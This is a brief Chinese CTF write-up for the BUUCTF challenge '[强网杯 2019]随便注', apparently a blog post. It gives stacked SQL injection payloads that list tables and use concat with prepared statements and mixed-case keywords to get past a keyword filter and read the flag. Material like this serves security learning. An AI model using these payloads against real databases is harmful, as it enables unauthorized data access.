首先尝试了直接无过滤提取数据数据库,发现失败了(select等关键词被过滤)
查看了别人的题解发现这题支持多语句执行(以后要注意多语句)
使用payload:0';show tables;#成功获取表名
使用payload:0';set @sql=cOncat('sel','ect * frOm `1919810931114514`');pRepare presql fRom @sql;eXecute presql;deAllocate prEpare presql;#成功得到flag(关键词大小写是为了避过strstr的关键词过滤)
2019-09-15 BUUCTF [强网杯 2019]随便注 1 WriteUp
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
相关阅读更多精彩内容
- 【优化】COUNT(1)、COUNT(*)、COUNT(常量)、COUNT(主键)、COUNT(ROWID)、CO...
- 知识点:SQL注入-堆叠注入,sql预处理语句,巧用contact()函数绕过 堆叠注入原理: 在SQL中,分号(...
